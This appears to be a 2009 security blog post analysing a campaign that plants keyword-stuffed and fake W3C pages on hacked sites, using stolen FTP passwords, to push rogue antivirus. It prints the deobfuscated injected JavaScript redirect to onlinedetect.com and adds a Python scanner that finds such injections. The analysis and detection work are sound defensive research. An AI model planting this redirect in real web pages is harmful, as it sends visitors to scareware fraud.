Saturday, March 28, 2009

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus

The World Wide Web Consortium and Rogue AV

Has your website been hacked, with IFRAMEs injected or trojans/backdoors planted?

Have your pages been infected with a redirection to rogue antivirus/antispyware?

Have your pages been replaced with a World Wide Web Consortium article with some
obfuscated JavaScript code appended to them?


This page presents some recent research into a malware campaign that has infected thousands of websites. In this campaign, all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard (sometimes called WinWebSecurity or SystemSecurity2009, with InternetAntivirusPro).

Since July/August 2008, hundreds of thousands of pages on legitimate domains have been compromised: web pages stuffed with keywords (porn, celebrities, popular snacks) were uploaded to them as a means of attracting victims via search engine results. In some cases the homepage of the compromised site is also modified, with hidden links to the malicious web page appended to it.

All the evidence indicates that the attack on all of these domains was carried out using stolen FTP passwords.

An alarming observation is that the activity is growing at an exponential rate, with the malware/exploit code becoming ever more sophisticated.

You can find some of the IPs, networks and domains used, examples of hacked pages/websites, and other malicious code injected into these domains via the links below or on other pages of this blog.

The silent threat: Black Hat SEO and Rogue AV - 1
The silent threat: Black Hat SEO and Rogue AV - 2

*********************

The screenshot below shows a large number of websites also used in this rogue AV malware campaign, but with World Wide Web Consortium (W3C) pages uploaded to them with JavaScript code injected.



Source of one of these sites.





In a browser.



Deobfuscation results:

window.location = encodeURI(
"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" +
encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL) + "&default_keyword=XXX");
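A site owner cleaning up after this campaign needs to find every page carrying the appended redirect, the hidden IFRAMEs and the hidden keyword links described above. The scanner below is an added example written for this post, not code from the campaign or from any referenced tool; its heuristics, the hostnames (victim.example, example.invalid) and the sample page are all constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics for the injection pattern described above: a script that reads
# document.referrer and rewrites window.location, obfuscated eval/unescape
# blobs, hidden IFRAMEs, and hidden off-site links stuffed into a page.
REDIRECT_RE = re.compile(r"window\.location(?:\.href)?\s*=")
REFERRER_RE = re.compile(r"document\.referrer")
OBFUSC_RE = re.compile(r"\b(?:eval|unescape)\s*\(")
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value):
    """True for the 0/1 pixel sizes used to hide an IFRAME."""
    return value.strip("'\" ").rstrip("px") in ("0", "1")

class InjectionScanner(HTMLParser):
    """Collects (indicator, detail) pairs for one page of the given site."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host, self.findings = site_host, []
        self._script = None  # list of chunks while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._script = []
        elif tag == "iframe" and (_tiny(a.get("width", "")) or _tiny(a.get("height", ""))
                                  or HIDDEN_RE.search(a.get("style", ""))):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "a" and HIDDEN_RE.search(a.get("style", "")):
            host = urlparse(a.get("href", "")).hostname
            if host and host != self.site_host:  # hidden link pointing off-site
                self.findings.append(("hidden-link", a["href"]))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            code, self._script = "".join(self._script), None
            if REDIRECT_RE.search(code) and REFERRER_RE.search(code):
                self.findings.append(("referrer-redirect", code.strip()[:40]))
            elif OBFUSC_RE.search(code) and len(code) > 150:
                self.findings.append(("obfuscated-script", code.strip()[:40]))

def scan_page(html, site_host):
    """Return the list of indicators found in one HTML document."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: a W3C-style page with the campaign's redirect appended.
SAMPLE = """<html><body><h1>World Wide Web Consortium</h1>
<a style="display:none" href="http://example.invalid/pages/celeb.html">x</a>
<iframe src="http://example.invalid/in.cgi" width=0 height=0></iframe>
<script>window.location = encodeURI("http://example.invalid/in.cgi?seoref=" +
encodeURIComponent(document.referrer));</script></body></html>"""
```

Run `scan_page(open(path).read(), "your.site")` over every HTML file in the webroot; a clean page yields an empty list, and any hit is a page to restore from a known-good copy after the FTP password has been changed.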

-----------------------

The source code also reveals thousands of hacked websites. Analysis of the JavaScript code shows that it redirects to onlinedetect.com or to other domains used in this attack.
You can find information on this page.